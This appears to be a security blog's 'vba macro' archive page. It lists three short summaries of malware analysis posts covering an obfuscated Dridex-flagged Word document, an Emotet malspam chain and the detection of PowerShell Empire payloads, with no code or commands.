vba macro

January 2021

On December 16th, 2020 Twitter user Insomnihack @pro_integritate posted an interesting obfuscated document, where it was flagged as Dridex in some sandboxes. This sample threw an error and would not open in Office 2010 until I changed the file extension to “doc’. The thing that stood out the most on initial inspection is the massive use of the properties “wd.. “ like “wdArtWeavingStrips” each of these properties map to constant values of “Word Enumerated Constants”

February 2019

This article covers the analysis of an interesting customer malspam encounter that was identified with a user-defined signature focusing on high levels of entropy within the file. Starting with a pdf lure to get an macro laiden downloader document and finished with emotet banking malware.

January 2019

Powershell Empire is a go-to tool for pentesters, red-teamers, and cyber-criminals. While it is an incredible framwork, the InQuest platform easily detects the obfuscated payloads that are generated.